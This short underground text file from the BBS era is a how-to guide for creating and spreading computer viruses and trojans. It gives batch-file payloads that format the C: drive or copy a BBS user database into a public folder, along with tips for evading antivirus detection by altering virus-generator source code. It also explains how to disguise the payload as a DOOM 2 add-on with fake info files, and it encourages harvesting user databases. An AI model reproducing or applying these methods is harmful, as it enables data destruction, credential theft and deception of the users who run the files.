How to start a Computer Epidemic
                            An informative txt file by

        I started to write this file when i was dreaming of the old days,
        when there were virii every where you turned, and people were
        scared of them. These were the days before mcaffe. But, since
        we arent putting out as many virii as we used to, people arent
        cautious. This file is to get people into writing more virii,
        and scaring more people. These are the true meanings of life.

        Unfortanitly, many of you cant code, and the people who can are
        out doing better things, than making virii. Lucky for you, there
        are programs like Instant Virus Productions[IVP], Virus Creation
        Labs[VCL], and others. The only problem with these files, is that
        mcaffe can pick em up. BUT, these files create a source code, either
        in .ASM or .PAS or .C. If you change the source codes around a
        little, mcaffe wont pick em up. Or, the newer versions of IVP and
        VCL can scramble the code, and not pick em up. Now, there is an
        easier way to go about makin a virii, its cheap, but it works.
        Use the BAT2COM file(inclosed in this .txt), and simply write
        a batch file. like:

                        ECHO OFF            ECHO OFF
                        CD\                 CD\BBS\DATA
                        FORMAT C:    or     COPY USERS.DAT MAIN.ANS
                        Y                   CLS
                        Y                   COPY MAIN.ANS C:\BBS\MISC
                                            CLS
        These are fairly primative, but you can get better with practice.
        Like, with BAT1.TXT , it has ansee color codes and prompts, so
        when they run it, they think it is real. This leads me into my
        next part. How to get them to run your little .com file. (if
        you already have a good file, procced to the next few paragraphs).
        To make someone run your file, it has to be good. People have
        to like it. The first thing that comes to my mind is a DOOM 2
        file. That does some shit like add more bloddy graphics, etc.
        And any PDer will run this of course, and your .bat will be
        exectued. Along with your .EXE (copy your .com file to .exe),
        include a file_id.diz(make one), and a .nfo file. In the info
        file blab some, and put down some fake addresses for $$$ for
        the prog(use Abigwar's list). Now you have a complete file,
        and as soon as someone runs it, what ever was in your .bat file
        is exectued.


       Your little file(should it be a .bat file or a real virus) should
       have spread farily quickly. One i put out, was circulated through
       most boards within a month.

       In my opion, its just a waste to format all the PDers HDs, cause
       in the end, its no benifit for you. Now, what COULD be a benifit,
       would be the users.dat or users.lst to all the local boards. With
       a easy .bat file, you will simply capture every local (or LD) user
       database within no time. You should keep a collection of them, show
       them to family when they come to visit, or brag to freinds, print
       them out and put them on the mantle.
